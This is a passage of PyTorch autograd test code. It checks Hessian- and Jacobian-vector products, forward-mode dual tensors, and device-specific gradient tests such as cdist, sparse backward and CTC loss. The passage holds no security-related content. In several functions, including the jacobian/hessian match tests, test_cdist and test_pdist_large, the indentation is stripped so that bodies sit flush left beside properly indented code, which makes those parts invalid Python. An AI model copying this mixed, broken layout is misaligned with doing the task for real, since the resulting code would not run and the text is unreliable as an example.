              torch.rand(4, dtype=torch.double, requires_grad=True))
    v = (torch.ones(3, dtype=torch.double, requires_grad=True),
         torch.ones(4, dtype=torch.double, requires_grad=True))
    out, hvp_val = autogradF.hvp(bar, inputs, v, create_graph=True)
    self._assert_same_struct(hvp_val, inputs)
    self.assertIsNotNone(out.grad_fn)
    self.assertIsNotNone(hvp_val[0].grad_fn)
    self.assertIsNotNone(hvp_val[1].grad_fn)

    # args[:2] are the function inputs, args[2:] is v
    gradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
    gradgradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)

    def foo(*args):
        x, y = args[:2]
        v = args[2:]

        x = x.cos()
        val, grad = autogradF.hvp(bar, (x, y), v, create_graph=True)

        return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos()

    gradcheck(foo, inputs + v)
    gradgradcheck(foo, inputs + v)
def test_jacobian_match_vjp_jvp(self):
def foo(x):
return x ** 3 + x.sum()
inputs = torch.rand(4)
v = torch.rand(4)
jac = autogradF.jacobian(foo, inputs)
jvp = autogradF.jvp(foo, inputs, v)[1]
vjp = autogradF.vjp(foo, inputs, v)[1]
self.assertEqual(jvp, torch.mm(jac, v.unsqueeze(1)).squeeze(1))
self.assertEqual(vjp, torch.mm(v.unsqueeze(0), jac).squeeze(0))
def test_hessian_match_vhp_hvp(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4)
v = torch.rand(4)
hes = autogradF.hessian(foo, inputs)
hvp = autogradF.hvp(foo, inputs, v)[1]
vhp = autogradF.vhp(foo, inputs, v)[1]
self.assertEqual(hvp, torch.mm(hes, v.unsqueeze(1)).squeeze(1))
self.assertEqual(vhp, torch.mm(v.unsqueeze(0), hes).squeeze(0))
class TestAutogradForwardMode(TestCase):
    """Tests for forward-mode AD dual Tensors (fwAD: torch.autograd.forward_ad)."""

    def tearDown(self):
        # Ensure that a failing test won't make others fail
        while fwAD._current_level >= 0:
            fwAD.exit_dual_level()

        super().tearDown()

    def test_forward_level_cleanup(self):
        """A dual keeps its tangent alive; deleting the dual must release it."""
        def get_tensor_and_weak_ref():
            # Create a new Tensor and weak reference
            t = torch.rand(2, requires_grad=True)
            return t, torch._C._WeakTensorRef(t)

        # Sanity check that the helper function works as expected
        t, t_ref = get_tensor_and_weak_ref()
        self.assertFalse(t_ref.expired())

        del t
        self.assertTrue(t_ref.expired())

        # Main test code
        foo = torch.rand(2)

        with fwAD.dual_level():
            tangent, tangent_ref = get_tensor_and_weak_ref()
            self.assertFalse(tangent_ref.expired())

            dual = fwAD.make_dual(foo, tangent)
            self.assertFalse(tangent_ref.expired())

            # Make sure that the tangent we provided has been re-used as is
            self.assertTrue(fwAD.unpack_dual(dual)[1] is tangent)

            # Make sure that dual is keeping the tangent alive
            del tangent
            self.assertFalse(tangent_ref.expired())

            # Make sure that the dual level does not keep the c++
            # version of the tangent alive
            del dual
            self.assertTrue(tangent_ref.expired())

    def test_size_check(self):
        """make_dual rejects a tangent whose size differs from the primal's."""
        foo = torch.rand(2)
        tangent = torch.rand(3)

        with fwAD.dual_level():
            with self.assertRaisesRegex(RuntimeError, "Trying to set a forward gradient that has a different size"):
                dual = fwAD.make_dual(foo, tangent)

            dual = fwAD.make_dual(foo, tangent[1:])

    # The following test functions want to ensure all the following behaviors:
    #   - Ensure that default level system in the python binding works
    #   - Ensure that only level 0 exists and nesting is properly disabled
    #   - Ensure that printing works fine
    #   - Ensure that basic packing/unpacking works
    #   - Ensure that advanced packing/unpacking works
    #     - For memory / version counter share
    #     - For backward AD (regular ops)
    #   - Ensure that view + inplace for both modes work fine
    #   - Ensure we do proper cleanup on exit of a level

    def test_default_level(self):
        """Packing/unpacking works inside a level; the tangent is dropped on exit."""
        foo = torch.rand(2)
        bar = torch.rand(2)

        with fwAD.dual_level():
            baz = fwAD.make_dual(foo, bar)
            baz_primal, baz_tangent = fwAD.unpack_dual(baz)
        self.assertEqual(baz_primal, foo)
        # We don't actually need to enforce that these two are the exact same python
        # object, feel free to relax in the future
        self.assertIs(baz_tangent, bar)

        # After the level exits, unpacking the same dual yields no tangent
        baz_primal, baz_tangent = fwAD.unpack_dual(baz)
        self.assertEqual(baz_primal, foo)
        self.assertEqual(baz_tangent, None)

    def test_nested_level(self):
        """Only level 0 exists; entering a nested dual level raises."""
        with fwAD.dual_level() as level:
            # For now only level 0 exists
            self.assertEqual(level, 0)

        with fwAD.dual_level():
            with self.assertRaisesRegex(RuntimeError, "Nested forward mode AD is not supported at the moment"):
                nest_level = fwAD.enter_dual_level()

    def test_print(self):
        """repr() of a dual Tensor mentions its tangent; plain Tensors don't."""
        with fwAD.dual_level() as level:
            a = torch.rand(3)
            self.assertFalse("tangent=" in str(a))

            b = fwAD.make_dual(a, torch.rand(3))
            self.assertFalse("tangent=" in str(a))
            self.assertTrue("tangent=" in str(b))

            b_primal, b_tangent = fwAD.unpack_dual(b)
            self.assertFalse("tangent=" in str(b_primal))
            self.assertFalse("tangent=" in str(b_tangent))

    def test_basic_packing_unpacking(self):
        """unpack_dual returns the primal and the very tangent object that was packed."""
        foo = torch.rand(2)
        bar = torch.rand(2)

        with fwAD.dual_level():
            baz = fwAD.make_dual(foo, bar)
            baz_primal, baz_tangent = fwAD.unpack_dual(baz)
            self.assertEqual(baz_primal, foo)
            self.assertIs(baz_tangent, bar)

            # Check that packing/unpacking did not change the input
            foo_primal, foo_tangent = fwAD.unpack_dual(foo)
            self.assertEqual(foo_primal, foo)
            self.assertIsNone(foo_tangent)

    def test_advanced_packing_unpacking(self):
        """Duals share memory/version counters with primal and tangent, and interact
        correctly with backward AD, detach()/detach_() and no_grad."""
        foo = torch.rand(2)
        bar = torch.ones(2)

        # Memory and version counter check
        with fwAD.dual_level():
            dual = fwAD.make_dual(foo, bar)

            # Ensure that they are sharing memory and version counter
            self.assertEqual(dual.storage().data_ptr(), foo.storage().data_ptr())

            # Ensure we properly share the version counter
            self.assertEqual(foo._version, dual._version)
            foo.add_(1)
            self.assertEqual(foo._version, dual._version)

            # Unpacking should only create aliases as well
            dual_primal, dual_tangent = fwAD.unpack_dual(dual)
            self.assertEqual(dual_primal.storage().data_ptr(), foo.storage().data_ptr())
            self.assertEqual(dual_tangent.storage().data_ptr(), bar.storage().data_ptr())
            # And the tangent is actually re-used as-is so it is still the same Tensor
            self.assertIs(dual_tangent, bar)

            # Ensure we properly share the version counter
            self.assertEqual(foo._version, dual_primal._version)
            foo.add_(1)
            self.assertEqual(foo._version, dual_primal._version)
            self.assertEqual(bar._version, dual_tangent._version)
            bar.add_(1)
            self.assertEqual(bar._version, dual_tangent._version)

        # backward mode check
        with fwAD.dual_level():
            foo.requires_grad_()
            bar.requires_grad_()

            # Check that backward gradients properly propagates through packing/unpacking
            dual = fwAD.make_dual(foo, bar)
            p, t = fwAD.unpack_dual(dual)

            gfoo, gbar = torch.autograd.grad(p.sum(), (foo, bar), retain_graph=True, allow_unused=True)
            self.assertEqual(gfoo, torch.ones_like(foo))
            self.assertIsNone(gbar)

            gfoo, gbar = torch.autograd.grad(t.sum(), (foo, bar), retain_graph=True, allow_unused=True)
            self.assertIsNone(gfoo)
            self.assertEqual(gbar, torch.ones_like(bar))

            # Check that forward gradients are impacted by detach()
            detached_dual = dual.detach()
            out = detached_dual * 2
            p, t = fwAD.unpack_dual(out)
            self.assertFalse(p.requires_grad)
            self.assertEqual(p, foo * 2)
            self.assertIsNone(t)

            # Check that forward gradients are not impacted by no_grad
            with torch.no_grad():
                out = dual * 3
            p, t = fwAD.unpack_dual(out)
            self.assertFalse(p.requires_grad)
            self.assertFalse(t.requires_grad)
            self.assertEqual(p, foo * 3)
            self.assertEqual(t, bar * 3)

            # Check that forward gradients are not impacted by inplace detach
            dual = dual.clone()
            dual.detach_()
            out = dual * 2
            p, t = fwAD.unpack_dual(out)
            self.assertFalse(p.requires_grad)
            self.assertEqual(p, foo * 2)
            self.assertIsNone(t)

    def test_view_inplace_non_differentiable_views(self):
        """In-place ops update a dual's tangent but not the tangent of
        non-(forward-)differentiable views of it."""
        original_foo = torch.rand(2, dtype=torch.double)
        original_bar = torch.ones(2, dtype=torch.double)

        # Do clones to be able to compare the values updated inplace
        # with the original content of these Tensors
        foo = original_foo.clone()
        bar = original_bar.clone()

        with fwAD.dual_level():
            # Note that in this test, we use "update" to mean computing the right tangent for the dual
            # All the inplace operations here are expected to update the primal value of the Tensors but
            # not always their tangents.
            # Also all mentions of "non differentiable view" here means non forward differentiable view
            # unless specified otherwise.
            # See note [Forward Grad View/inplace] for more details on how these views work.

            # Check that inplace ops do not update non-differentiable views
            # Non differentiable view
            dual = fwAD.make_dual(foo, bar)
            dual *= 2
            # Check that non differentiable view's tangent was not updated
            self.assertIsNone(fwAD.unpack_dual(foo)[1])
            # Check that the computed result is correct
            self.assertEqual(bar, original_bar * 2)
            self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2)
            self.assertEqual(foo, original_foo * 2)
            self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 2)
            # Other non differentiable view
            dual_primal, dual_tangent = fwAD.unpack_dual(dual)
            self.assertIsNone(fwAD.unpack_dual(dual_primal)[1])
            self.assertIsNone(fwAD.unpack_dual(dual_tangent)[1])
            dual_primal *= 2
            # Ensure dual's tangent did not change
            self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4)
            self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2)
            dual_tangent *= 2
            # Ensure dual's primal did not change
            self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4)
            self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 4)

    def test_view_inplace_differentiable_views(self):
        """In-place ops propagate tangents through forward-differentiable views only."""
        original_foo = torch.rand(2)
        original_bar = torch.ones(2)

        # Do clones to be able to compare the values updated inplace
        # with the original content of these Tensors
        foo = original_foo.clone()
        bar = original_bar.clone()

        with fwAD.dual_level():
            # Check that inplace ops do update differentiable view but stop at non differentiable ones
            # A non differentiable view
            dual = fwAD.make_dual(foo, bar)
            # A differentiable view
            view = dual.narrow(0, 0, 1)
            view *= 2
            # Check that non differentiable view was not updated
            self.assertIsNone(fwAD.unpack_dual(foo)[1])
            # Check that differentiable view was updated
            self.assertEqual(fwAD.unpack_dual(dual)[1], torch.tensor([2., 1.]))
            self.assertEqual(fwAD.unpack_dual(view)[1], torch.tensor([2.]))

            # Check that we track differentiable view even for Tensors that are not dual
            baz = torch.rand(2)
            baz += dual
            self.assertEqual(fwAD.unpack_dual(baz)[1], fwAD.unpack_dual(dual)[1])

            # Updates on view should as well
            baz = torch.rand(2)
            baz[0] = dual[0]
            self.assertEqual(fwAD.unpack_dual(baz)[1][0], fwAD.unpack_dual(dual)[1][0])
            # Unused values get a gradient of 0
            self.assertEqual(fwAD.unpack_dual(baz)[1][1], 0.)

            # Check that forward non-differentiable views do prevent gradient update
            baz = torch.rand(2)
            view = baz.detach()
            view += dual
            self.assertIsNone(fwAD.unpack_dual(baz)[1])

    def test_grad_cleanup(self):
        """Tangents do not survive their dual level, and levels don't leak into each other."""
        foo = torch.rand(2)
        bar = torch.rand(2)
        baz = torch.rand(2)

        with fwAD.dual_level():
            dual = fwAD.make_dual(foo, bar)
            self.assertIsNone(fwAD.unpack_dual(foo)[1])
            self.assertIs(fwAD.unpack_dual(dual)[1], bar)

        # After exiting the level, the old dual has no tangent anymore
        self.assertIsNone(fwAD.unpack_dual(dual)[1])

        with fwAD.dual_level():
            self.assertIsNone(fwAD.unpack_dual(foo)[1])
            new_dual = fwAD.make_dual(foo, baz)

            dual_primal, dual_tangent = fwAD.unpack_dual(dual)
            new_dual_primal, new_dual_tangent = fwAD.unpack_dual(new_dual)
            self.assertEqual(dual_primal, new_dual_primal)
            self.assertIsNone(dual_tangent)
            self.assertEqual(new_dual_tangent, baz)

    def test_detach_view_tracking(self):
        """detach() produces a view that does not keep its base Tensor alive."""
        # Default detach is both forward and backward non-differentiable
        foo = torch.rand(2)
        foo_weak = torch._C._WeakTensorRef(foo)

        out = foo.detach()

        del foo
        self.assertTrue(foo_weak.expired())

    def test_out_variant(self):
        """out= variants are rejected when a dual Tensor is involved either way."""
        with fwAD.dual_level():
            foo = fwAD.make_dual(torch.rand(2), torch.rand(2))
            bar = torch.rand(2)

            with self.assertRaisesRegex(RuntimeError, "out= function"):
                torch.add(bar, bar, out=foo)

            with self.assertRaisesRegex(RuntimeError, "out= function"):
                torch.add(foo, bar, out=bar)
# Generic device type autograd tests.
class TestAutogradDeviceType(TestCase):
def test_min_max_median_backprops_to_all_values(self, device):
for f in [torch.min, torch.max, torch.median, torch.nanmedian]:
x1 = torch.tensor([1., 0., 1., 0., 1., 0.], device=device, requires_grad=True)
x2 = torch.tensor([float('nan'), float('nan'), float('nan')], requires_grad=True)
for x in [x1, x2]:
y = f(x)
y.backward()
self.assertEqual(x.grad.sum(), 1.)
self.assertEqual((x.grad == 1 / 3).sum(), 3)
def test_cdist(self, device):
def _test_euclidean_large_cdist(sizex, sizey=None):
if sizey is None:
sizey = sizex
x = torch.randn(sizex, device=device, dtype=torch.float)
y = torch.randn(sizey, device=device, dtype=torch.float)
eps = 1e-6
# to avoid extremum
x = x - (((x - y) < eps).float() * 2 * eps)
x.requires_grad = True
y.requires_grad = True
dist = torch.cdist(x, y, p=2)
# Do a backward pass to check that it is valid for large
# matrices
loss = dist.sum()
loss.backward()
_test_euclidean_large_cdist((2000, 5))
# Ensure that cdist backward with p<1 does not produce NaNs
def test_cdist_grad_p_lt_1_no_nan(self, device):
for p in [0.99, 0.7, 0.5, 0.1, 0.01]:
x = torch.randn(1, 2, device=device)
y = x.clone().detach() + torch.tensor([[1., 0.]], device=device)
x.requires_grad = True
y.requires_grad = True
result = torch.cdist(x, y, p=p)
result.backward(torch.ones_like(result))
self.assertFalse(torch.isnan(x.grad).any())
self.assertFalse(torch.isnan(y.grad).any())
def test_cdist_same_inputs(self, device):
# Test to detect issues in cdist gradient calculation
# When the distances are 0
sizex = (1, 27, 32)
for p in [0, 1, 2, 3, 1.5, 2.5, float('inf')]:
x = torch.randn(sizex, device=device, dtype=torch.float)
dist_grad = torch.randn((1, 27, 27), device=device, dtype=torch.float)
y = x.clone()
eps = 1e-6
x.requires_grad = True
d = torch.cdist(x, y)
d.backward(dist_grad)
# Check that the backward passs does not contain invalid
# values such as nan or inf
assert torch.isfinite(x.grad).all()
def test_parameter_resize(self, device):
asd = torch.nn.Parameter(torch.ones(16, dtype=torch.double, device=device))
for i in range(2):
with torch.no_grad():
asd.set_(asd[1:])
asd.grad = None
m = torch.cat((asd, asd))
m.sum().backward()
@dtypes(torch.double, torch.cdouble)
def test_sparse_ctor_getter_backward(self, device, dtype):
    """Gradcheck autograd through sparse_coo_tensor construction, coalesce and values()."""
    # See NOTE [ Sparse: autograd and API ] on the expected behavior of this test
    def _test(size, sparse_dim, nnz, device):
        # Build random integer indices within the sparse dims of the given size
        v_size = [nnz] + list(size[sparse_dim:])
        i = torch.rand(sparse_dim, nnz)
        i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i))
        i = i.to(torch.long)

        inp = torch.randn(v_size, dtype=torch.double, device=device, requires_grad=True)
        other = self.genSparseTensor(size, sparse_dim, nnz, is_uncoalesced=True, device=device,
                                     dtype=dtype)[0]

        def fn(v):
            # Round-trip the values through sparse construction, add, coalesce
            # and values() so each step participates in the checked graph
            x = torch.sparse_coo_tensor(i, v, size, dtype=dtype, device=device)
            y = (x + other).coalesce()
            yv = y.values()
            new_v = yv.tanh()
            z = torch.sparse_coo_tensor(y.indices(), new_v, y.size())
            return z.coalesce().values()

        gradcheck(fn, (inp,), check_batched_grad=False)
        # FIXME: make gradgradcheck work.
        # gradgradcheck(fn, (inp,), check_batched_grad=False)

        # assert that _values is non-differentiable
        with self.assertRaisesRegex(RuntimeError, "does not have a grad_fn"):
            other.detach().requires_grad_()._values().backward(torch.ones_like(other._values()))

    # Cover every combination of empty/non-empty indices, values and nnz
    for empty_i, empty_v, empty_nnz in product([True, False], repeat=3):
        sparse_size = [] if empty_i else [2, 1]
        dense_size = [1, 0, 2] if empty_v else [1, 2]
        nnz = 0 if empty_nnz else 5
        _test(sparse_size + dense_size, len(sparse_size), nnz, device)
@dtypes(torch.double, torch.cdouble)
def test_sparse_backward(self, device, dtype):
    """Sparse and dense gradients accumulate correctly into one leaf, in any order."""
    class FixedGradientFunction(Function):
        # Identity forward; backward always returns the fixed grad given to forward.
        @staticmethod
        def forward(ctx, x, grad_x):
            ctx.save_for_backward(grad_x)
            return x

        @staticmethod
        def backward(ctx, grad_x):
            saved_grad_x, = ctx.saved_tensors
            return saved_grad_x, None

    size = torch.Size([6, 3, 2])
    i1 = torch.tensor([
        [0, 3, 4],
        [0, 2, 2],
    ], dtype=torch.long)
    v1 = make_tensor([3, 2], dtype=dtype, device=device)
    sparse_grad1 = torch.sparse_coo_tensor(i1, v1, size, dtype=dtype, device=device)
    i2 = torch.tensor([
        [0, 1, 3, 4],
        [0, 1, 2, 2],
    ], dtype=torch.long)
    v2 = make_tensor([4, 2], dtype=dtype, device=device)
    sparse_grad2 = torch.sparse_coo_tensor(i2, v2, size, dtype=dtype, device=device)
    dense_grad = torch.rand(size, device=device, dtype=dtype)
    fn = FixedGradientFunction

    # sparse first
    x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
    (fn.apply(x, sparse_grad1) + fn.apply(x, dense_grad) + fn.apply(x, sparse_grad2)).sum().backward()
    self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2)
    # dense first
    x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
    (fn.apply(x, dense_grad) + fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward()
    self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2)
    # sparse only
    x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
    (fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward()
    self.assertEqual(x.grad, sparse_grad1 + sparse_grad2)
# autograd tests via common_method_invocations don't allow input tensors to
# be sparse (RuntimeError: gradcheck expects all tensor inputs are dense when
# check_sparse_nnz is set to False.)
def test_sparse_mask_autograd(self, device):
    # Backprop through sparse_mask: the gradient w.r.t. the dense input is
    # exactly the (densified) mask.
    inp = torch.randn(3, requires_grad=True, device=device)
    dense_mask = torch.ones(3, device=device)
    dense_mask[1] = 0
    sparse_mask = dense_mask.to_sparse()
    out = inp.sparse_mask(sparse_mask).to_dense()
    out.sum().backward()
    self.assertEqual(inp.grad, sparse_mask.to_dense())
def test_pyscalar_conversions(self, device):
    """Conversions between 1-element tensors and Python scalars:
    int()/float()/bool() round-trips, precision loss, and the error cases
    (nan -> int raises ValueError, +/-inf -> int raises OverflowError)."""
    def _test_pyscalar_conversions(t, integral_conv):
        # integral -> integral
        l = t(torch.zeros(1, 1, 1, dtype=torch.long))
        pyscalar = -12345
        l[0] = pyscalar
        self.assertEqual(integral_conv(l), pyscalar)
        # floating point -> floating point
        f = Variable(t(torch.randn(1, 1, dtype=torch.double)))
        pyscalar = -12345.1
        f[0] = pyscalar
        self.assertEqual(float(f), pyscalar)
        f[0] = nan
        self.assertTrue(math.isnan(float(f)))
        f[0] = inf
        self.assertEqual(float(f), inf)
        f[0] = -inf
        self.assertEqual(float(f), -inf)
        # integral -> floating point
        # check we can convert something that loses precision
        pyscalar = 1234567890123456789
        self.assertNotEqual(pyscalar, integral_conv(float(pyscalar)))
        l[0] = pyscalar
        self.assertEqual(float(l), float(pyscalar))
        # floating point -> integral
        f[0] = nan
        self.assertRaises(ValueError, lambda: integral_conv(f[0]))
        f[0] = inf
        self.assertRaises(OverflowError, lambda: integral_conv(f[0]))
        f[0] = -inf
        self.assertRaises(OverflowError, lambda: integral_conv(f[0]))
        f[0] = sys.float_info.max
        self.assertEqual(integral_conv(f), sys.float_info.max)
        # bool, nonzero
        def test_nonzero(tensor, value, expected):
            # bool(tensor) and truthiness in an `if` must agree with `expected`
            tensor[0] = value
            self.assertEqual(expected, bool(tensor))
            self.assertEqual(expected, True if tensor else False)
        test_nonzero(l, 0, False)
        test_nonzero(l, -2, True)
        test_nonzero(f, 0.0, False)
        test_nonzero(f, sys.float_info.min, True)
        test_nonzero(f, nan, bool(nan))
        test_nonzero(f, inf, bool(inf))
        test_nonzero(f, -inf, bool(-inf))
    # Exercise the conversions on `device`, converting via plain int().
    _test_pyscalar_conversions(lambda x: x.to(device), lambda x: int(x))
@dtypesIfCUDA(torch.half, torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64)
@dtypes(torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64)
def test_set_requires_grad_only_for_floats(self, device, dtype):
    # Turning requires_grad ON must fail for integral dtypes (via method,
    # attribute, or factory kwarg); turning it OFF always succeeds.
    def f1():
        torch.ones(1, dtype=dtype, device=device).requires_grad_()
    def f2():
        t = torch.ones(1, dtype=dtype, device=device)
        t.requires_grad = True
    def f3():
        torch.ones(1, dtype=dtype, device=device, requires_grad=True)
    a = torch.ones(1, dtype=dtype, device=device)
    a.requires_grad = False  # should always work
    a.requires_grad_(False)
    for f in (f1, f2, f3):
        if not dtype.is_floating_point:
            with self.assertRaisesRegex(RuntimeError, 'floating point', msg="dt: {} device: {}".format(a.dtype, a.device)):
                f()
        else:
            f()
@onlyCUDA
def test_advanced_indexing_backwards_large(self, device):
    # See https://github.com/pytorch/pytorch/issues/22843
    # Advanced indexing backward on a large (2^16 row) tensor; the grad of a
    # full-column gather is all ones.
    num_rows = (1 << 16)
    src = torch.rand(num_rows, 1, device=device, requires_grad=True)
    src[:, [0]].sum().backward()
    self.assertEqual(src.grad, torch.ones(num_rows, 1, device=device))
def test_advanced_indexing_backwards_memory_format(self, device):
# See https://github.com/pytorch/pytorch/issues/36956
shape = (2, 8, 1, 2)
i = torch.randint(1, shape, device=device).contiguous(memory_format=torch.channels_last)
x = torch.randn(shape, requires_grad=True, device=device)
x[i].sum().backward()
def _test_reentrant_parent_error_on_cpu(self, device):
    """An error in the parent (CPU) graph must stop the reentrant child
    (GPU) graph before any gradients are accumulated.

    NOTE(review): despite the name, `device` is typically 'cuda' here
    (driven by the @onlyCUDA caller below) — confirm against the caller.
    """
    t1 = torch.rand([3, 3], requires_grad=True)
    t2 = torch.rand([3, 3], device=device, requires_grad=True)
    t3 = torch.rand([3, 3], device=device, requires_grad=True)
    # Parent graph cpu graph.
    t4 = t1 * t1
    t5 = TestAutograd.SimulateBackwardError.apply(t4)
    # Child gpu graph (much longer than parent graph).
    prev = t2 * t2
    for i in range(10):
        prev = prev * t2
    reentrant_root = prev
    class ReentrantFunc(Function):
        @staticmethod
        def forward(ctx, inp):
            return inp.clone()
        @staticmethod
        def backward(ctx, grad):
            # Reentrant backward in child will take much longer.
            reentrant_root.backward()
            return grad
    # Parent gpu graph.
    t6 = ReentrantFunc.apply(t3)
    t7 = t6 * t6
    # Parent graph will error out first, while child graph will continue executing.
    with self.assertRaisesRegex(Exception, "Simulate error"):
        torch.autograd.backward([t5.sum(), t7.sum()])
    # No grads should be accumulated since child graph will stop execution
    # after parent receives error.
    self.assertIsNone(t2.grad)
    self.assertIsNone(t1.grad)
    self.assertIsNone(t3.grad)
@onlyCUDA
def test_reentrant_parent_error_on_cpu(self, device):
    """Wrapper around _test_reentrant_parent_error_on_cpu that additionally
    checks no CUDA memory is leaked once the failed tasks are cleaned up."""
    before = CudaMemoryLeakCheck.get_cuda_memory_usage()
    # Run as separate function so that gc can clean up everything when we
    # check for memory usage.
    self._test_reentrant_parent_error_on_cpu(device)
    # Wait for autograd thread to cleanup failed tasks.
    after = CudaMemoryLeakCheck.get_cuda_memory_usage()
    start = time.time()
    # Poll (up to 30s) because the autograd engine frees asynchronously.
    while before != after and time.time() - start < 30:
        time.sleep(0.1)
        after = CudaMemoryLeakCheck.get_cuda_memory_usage()
    self.assertEqual(before, after)
# test for backward in https://github.com/pytorch/pytorch/issues/15511
# TODO: opinfo pdist
def test_pdist_large(self, device):
def func(x):
return torch.pdist(x, p=2)
# shape[0] should be able to be (roughly) arbitrarily large, but the kernel
# is currently limited to smaller sizes (see issue above); this is just testing
# a floor.
shape = (1000, 1)
x = torch.randn(shape, device=device).requires_grad_()
output = torch.pdist(x, p=2)
# just run a single backward, as gradcheck/gradgradcheck is expensive here
output.sum().backward()
# TODO: see if these tests can be ported to OpInfos or moved to where's test suite
def test_where_functional(self, device):
    # gradcheck/gradgradcheck torch.where, first with same-shape operands,
    # then with broadcasting ones.
    def where(cond, x, y):
        return torch.where(cond, x, y)
    lhs = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
    rhs = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
    cond = mask_not_all_zeros((5, 5)).to(device=device)
    gradcheck(where, [cond, lhs, rhs], raise_exception=True)
    gradgradcheck(where, [cond, lhs, rhs], [torch.randn(5, 5, device=device)])
    # broadcasting operands
    lhs = torch.randn(5, 1, 5, dtype=torch.double, device=device, requires_grad=True)
    rhs = torch.randn(5, 5, 1, dtype=torch.double, device=device, requires_grad=True)
    gradcheck(where, [cond, lhs, rhs], raise_exception=True)
    gradgradcheck(where, [cond, lhs, rhs], [torch.randn(5, 5, 5, device=device)])
def test_where_scalar(self, device):
    # gradcheck/gradgradcheck torch.where with a Python scalar in either
    # operand position.
    scalar = 4.
    tensor_arg = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
    cond = mask_not_all_zeros((5, 5)).to(device=device)
    def where_scalar_first(cond, x):
        return torch.where(cond, scalar, x)
    def where_scalar_second(cond, x):
        return torch.where(cond, x, scalar)
    for fn in (where_scalar_first, where_scalar_second):
        gradcheck(fn, (cond, tensor_arg))
        gradgradcheck(fn, (cond, tensor_arg))
@skipCUDAIf(True, """Test is flaky on Linux and Windows, typical error message:
                     https://github.com/pytorch/pytorch/issues/34870""")
def test_ctc_loss(self, device):
    """gradcheck ctc_loss over combinations of varying input lengths and
    zeroed target lengths; the log-probs are generated from a small
    gradcheck-sized parameter tensor via tiling."""
    batch_size = 64
    num_labels = 101
    target_length = 15
    gradcheck_input_size = 10
    # How target lengths are zeroed for a test case:
    ZERO_NONE = 0
    ZERO_SOME = 1
    ZERO_ALL = 2
    # input_length, vary_lengths, zero_lengths
    tests = [(150, False, ZERO_NONE),
             (150, True, ZERO_NONE),
             (50, True, ZERO_SOME),
             (50, True, ZERO_ALL)]
    if 'cuda' in device:
        tests += [(50, False, ZERO_NONE),
                  (50, True, ZERO_NONE),
                  (150, True, ZERO_SOME),
                  (150, True, ZERO_ALL)]
    for input_length, vary_lengths, zero_mode in tests:
        # Labels start at 1 because 0 is the CTC blank.
        targets = torch.randint(1, num_labels, (batch_size, target_length),
                                device=device, dtype=torch.long)
        # Small differentiable input; tiled up to full log-prob size below.
        x = torch.randn(gradcheck_input_size, dtype=torch.double, device=device, requires_grad=True)
        tile_factors = torch.randn(input_length * batch_size * num_labels // gradcheck_input_size + 1,
                                   device=device)
        input_lengths = [(torch.randint(input_length // 2, input_length + 1, ()).item()
                          if vary_lengths or i == 0 else input_length) for i in range(batch_size)]
        if zero_mode == ZERO_ALL:
            target_lengths = [0 for _ in range(batch_size)]
        else:
            target_lengths = [(torch.randint(target_length // 2, target_length + 1, ()).item()
                               if vary_lengths else target_length) for _ in range(batch_size)]
            if zero_mode == ZERO_SOME:
                # Zero out 10 randomly chosen target lengths.
                idxes = torch.randint(0, batch_size, (10,))
                for i in idxes:
                    target_lengths[i] = 0
        def ctc_after_softmax(x):
            # Expand x via the tile factors to (input_length, batch, labels)
            # so gradcheck only has to perturb gradcheck_input_size values.
            x_full = ((x[:, None] * tile_factors[None, :]).view(-1)[:input_length * batch_size * num_labels]
                      .view(input_length, batch_size, num_labels))
            log_probs = torch.log_softmax(x_full, 2)
            return torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths)
        gradcheck(ctc_after_softmax, [x])
@onlyCUDA
@skipCUDAIfRocm
@skipCUDAIfCudnnVersionLessThan(7600)
def test_ctc_loss_cudnn(self, device):
    """The CuDNN CTC-loss gradient must match the native implementation's.

    NOTE(review): uses the literal 'cuda' rather than `device`; under
    @onlyCUDA these coincide for device 0 — confirm if multi-GPU matters.
    """
    batch_size = 16
    input_length = 30
    num_labels = 101
    target_length = 15
    targets = torch.randint(1, num_labels, (batch_size * target_length,),
                            device='cuda', dtype=torch.long)
    log_probs = torch.log_softmax(torch.randn(input_length, batch_size, num_labels, device='cuda', dtype=torch.float), 2)
    log_probs.requires_grad_()
    input_lengths = batch_size * [input_length]
    target_lengths = batch_size * [target_length]
    grad_out = torch.randn(batch_size, device='cuda', dtype=torch.float)
    # Reference gradient with CuDNN disabled.
    with torch.backends.cudnn.flags(enabled=False):
        loss_native = torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths, reduction='none')
        grad_native, = torch.autograd.grad(loss_native, log_probs, grad_out)
    # int32 CPU targets route the op to the CuDNN kernel.
    loss_cudnn = torch.nn.functional.ctc_loss(log_probs, targets.to('cpu', torch.int32),
                                              input_lengths, target_lengths, reduction='none')
    self.assertTrue("Cudnn" in str(loss_cudnn.grad_fn))
    grad_cudnn, = torch.autograd.grad(loss_cudnn, log_probs, grad_out)
    self.assertEqual(grad_cudnn, grad_native, atol=1e-4, rtol=0)
def test_leaky_relu_inplace_with_neg_slope(self, device):
    # With a negative slope the in-place op is not invertible, so backward
    # must tell the user to call the out-of-place version.
    for inplace_fn, extra_args in ((torch.nn.functional.leaky_relu_, (-2,)),
